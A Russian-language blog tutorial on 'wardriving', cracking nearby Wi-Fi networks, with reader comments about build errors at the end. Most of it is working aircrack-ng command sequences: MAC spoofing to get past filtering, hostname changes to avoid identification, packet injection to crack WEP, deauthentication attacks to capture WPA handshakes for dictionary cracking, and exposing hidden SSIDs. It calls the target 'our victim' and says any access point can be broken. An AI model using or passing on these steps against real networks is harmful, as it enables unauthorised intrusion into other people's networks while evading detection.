Вардрайвинг (англ. Wardriving) — процесс поиска и взлома пароля уязвимых точек доступа беспроводных сетей Wi-Fi человеком либо группой лиц, оснащенных переносным компьютером с Wi-Fi-адаптером. При этом для пространственного поиска и локализации точки используется транспортное средство (отсюда и название — боевое вождение). Подробнее…
Для данных целей имеем:
Готовимся. Ставим пакет aircrack-ng и macchanger
sudo apt-get install aircrack-ng macchanger
Начиная с версии Ubuntu 12.04, aircrack-ng не содержится в репозиториях Ubuntu. По этой причине придется либо ставить из deb пакета (скачать можнотут) или собирать самим вот так:
sudo wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz tar -zxvf aircrack-ng-1.1.tar.gz cd aircrack-ng-1.1
Отредактируем файл common.mak заменив строку:
CFLAGS ?= -g -W -Wall -Werror -O3
Строкой:
CFLAGS ?= -g -W -Wall -O3
Все далее собираем и устанавливаем:
sudo make sudo make install
Теория. Точки бывают открытые или закрытые. Открытые собственно нечего ломать, берем и заходим. Единственное что может помешать так это фильтрация по mac адресам. Обойти ее можно так:
sudo airodump-ng wlan0
Смотрим за точкой и ее клиентами. Если нет клиентов, то ждем их. Запоминаем mac адрес клиента и:
sudo ifconfig wlan0 down sudo macchanger wlan0 --mac=00:11:22:33:44:55 sudo ifconfig wlan0 up
тут 00:11:22:33:44:55 это mac адрес клиента Wi-Fi точки (нашей жертвы). Ну и все подключаемся к точке.
Далее точка у нас закрытая с шифрованием WEP.
Пояснение. Сначала мы смотрим что за точка, ее mac адрес, канал на котором она работает и ssid
sudo airodump-ng wlan0
Узнаем свой MAC адрес
ifconfig wlan0
Имеем
Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга.
sudo airmon-ng stop wlan0 sudo airmon-ng start wlan0 6
Виртуальный интерфейс mon0 создан. Для надежности сменим MAC адрес нашего интерфейса:
sudo ifconfig mon0 down sudo macchanger mon0 --mac=00:11:22:33:44:55 sudo ifconfig mon0 up
Так же стоит отметить что Host имя тоже может засветится, по этой причине стоит его тоже менять периодически (данное действие требует перезагрузки):
sudo vim /etc/hostname #Например qwhjvsda sudo vim /etc/hosts #Во второй строке тоже самое: qwhjvsda
Ловим пакеты от нашей точки.
sudo airodump-ng mon0 -w wep -c 6 --bssid 00:14:d1:4b:06:7e
Тут mon0 — интерфейс созданный airmon-ng, 6 — канал точки доступа, 00:14:d1:4b:06:7e — ее мак адрес. wep — имя файлов с данными. Можно принципе ждать, но лучше ускорится =) В новой консоли делаем следующее:
sudo aireplay-ng -1 0 -e ClonNET -a 00:14:D1:4B:06:7E -h 1C:4B:D6:B8:23:E5 mon0 sudo aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:D1:4B:06:7E -h 1C:4B:D6:B8:23:E5 mon0
Тут ClonNET — ssid точки доступа, 00:14:D1:4B:06:7E — ее MAC адрес, 1C:4B:D6:B8:23:E5 — наш MAC адрес, mon0 — наш интерфейс. Пакеты заметно полились быстрее в первой консоли с airodump-ng. Теперь можно ломать.
aircrack-ng -P 1 wep*.cap
Тут wep*.cap — имя файлов что указано было выше. Процесс подумает, посчитает и выдаст нам ключ к сети, если не выдаст то скажет сколько еще пакетов нам с Вами собрать.
[ad name=»Alfa»]
Дело в том, что при взламывании WPA handshake (пакет авторизации) получить можно только в процессе авторизации клиента. По этой причине нам нужен клиент который работает с точкой доступа и заставить его переавторизоваться.
sudo airodump-ng wlan0
Узнаем свой MAC адрес
ifconfig wlan0
Имеем
Получив всю информацию преступаем. Переводим наш адаптер в режим мониторинга. Да канал можно не указывать, как это я делал в первый раз.
sudo airmon-ng stop wlan0 sudo airmon-ng start wlan0
Виртуальный интерфейс mon0 создан. Для надежности сменим MAC адрес нашего интерфейса:
sudo ifconfig mon0 down sudo macchanger mon0 --mac=00:11:22:33:44:55 sudo ifconfig mon0 up
Так же стоит отметить что Host имя тоже может засветится, по этой причине стоит его тоже менять периодически (данное действие требует перезагрузки):
sudo vim /etc/hostname #Например qwhjvsda sudo vim /etc/hosts #Во второй строке тоже самое: qwhjvsda
Ловим пакеты от нашей точки.
sudo airodump-ng -c 6 -w cap mon0
Тут немного я упростил. Так как у меня всего одна точка была в зоне видимости, то я писал в файл cap все пакеты с 6 канала со всех точек (в моем случае она одна была). Если точек больше смотри по аналогии с wep шифрованием. В другой консоли делаем следующее:
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e -c 00:25:D3:24:B5:DF mon0
Так мы заставили клиента с MAC адресом 00:25:D3:24:B5:DF переавторизоваться тем самым в первой консоли сверху появится надпись handshake — т.е. мы поймали пакет авторизации. Можно воспользоватьсяWireshark’ом и отслеживать пакеты авторизации по протоколу eapol. Ломаем.
aircrack-ng -w pass.txt cap-01.cap
А теперь суть. WPA ломать простым перебором плохая идея. На это уйдут годы. По этой причине перебор организуем по словарю. В данном примере словарь pass.txt. Вообще словари Вы можете найти тут.
Перебор по словарю поможет только в случае легкого пароля, иначе сломать практически нереально. Однако при включенной опции WPS на точке доступа взломать ее становится многим проще. Как это сделать я описал тут.
[ad name=»MiBand2″]
Некоторая неприятность — Hidden SSID. Это когда в airodump-ng вместо SSID точки доступы вы видите <length:?> где вместо ? стоит число (это число длина SSID). В этом случае для определения SSID нам нужно либо дождаться клиента к точке доступа, тогда airodump-ng сам определит ее имя, либо вытолкнуть подключенного клиента к примеру вот так:
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e -c 00:25:D3:24:B5:DF mon0
Тут 00:25:D3:24:B5:DF — MAC клиента, 00:14:d1:4b:06:7e — MAC точки доступа. Собственно все. Благодаря этому инструментарию в принципе можно сломать любую Wi-Fi точку доступа.
Появление ошибки:
mon0 is on channel -1, but the AP uses channel 6 после строки:
sudo aireplay-ng --deauth 5 -a 00:14:d1:4b:06:7e -c 00:25:D3:24:B5:DF mon0
Для начала надо при создании интерфейса mon0 указать канал:
sudo airmon-ng start wlan0 6
Если это не помогло тогда попробуйте еще вот такую команду:
sudo iwconfig mon0 channel 6
6 — это для примера, в Вашем случае тот канал на котором работает точка доступа. Если после всех попыток по прежнему появляется данная ошибка, то, как заметил Quantum в комментариях, необходимо патчить драйвера. Статья которую привел Quantum в моем случае не помогла по видимому из-за версии драйверов, по этой причине привожу другую которая сработала: Вот она.
Далее необходимые команды:
sudo apt-get install build-essential wget http://wireless.kernel.org/download/compat-wireless-2.6/ compat-wireless.tar.bz2 tar -jxf compat-wireless.tar.bz2 cd compat-wireless* wget http://patches.aircrack-ng.org/ mac80211.compat08082009.wl_frag+ack_v1.patch patch -p1 < mac80211.compat08082009.wl_frag+ack_v1.patch wget http://patches.aircrack-ng.org/ channel-negative-one-maxim.patch patch ./net/wireless/chan.c channel-negative-one-maxim.patch #Иногда нужно подправить следующий участок gedit scripts/update-initramfs #*** Найдите подобную строку: KLIB=/lib/modules/2.6.31-wl/build #*** Исправьте на это: KLIB=/lib/modules/$(uname -r)/build #Собираем и устанавливаем make && sudo make install #Перезагрузка sudo reboot
После перезагрузки проверяем. Если что то пошло не так то отменить данные действия можно следующей командой:
sudo make uninstall
Также попробуйте более свежую версию драйверов например эти или выберите наиболее актуальные тут.
Чтобы взломать сеть Wi-Fi с помощью Kali Linux, вам нужна беспроводная карта, поддерживающая режим мониторинга…
Работа с консолью считается более эффективной, чем работа с графическим интерфейсом по нескольким причинам.Во-первых, ввод…
Конечно, вы также можете приобрести подписку на соответствующую услугу, но наличие SSH-доступа к компьютеру с…
С тех пор как ChatGPT вышел на арену, возросла потребность в поддержке чата на базе…
Если вы когда-нибудь окажетесь в ситуации, когда вам нужно взглянуть на спектр беспроводной связи, будь…
Elastic Security стремится превзойти противников в инновациях и обеспечить защиту от новейших технологий злоумышленников. В…
View Comments
А где смотреть пароль?
In file included from aircrack-ng.c:65:0:
crypto.h:12:26: fatal error: openssl/hmac.h: No such file or directory
#include
^
compilation terminated.
Отредактируем файл common.mak заменив строку:
1
CFLAGS ?= -g -W -Wall -Werror -O3
Строкой:
1
CFLAGS ?= -g -W -Wall -O3
неужели это не можно организовать одной командой ?
CFLAGS: команда не найдена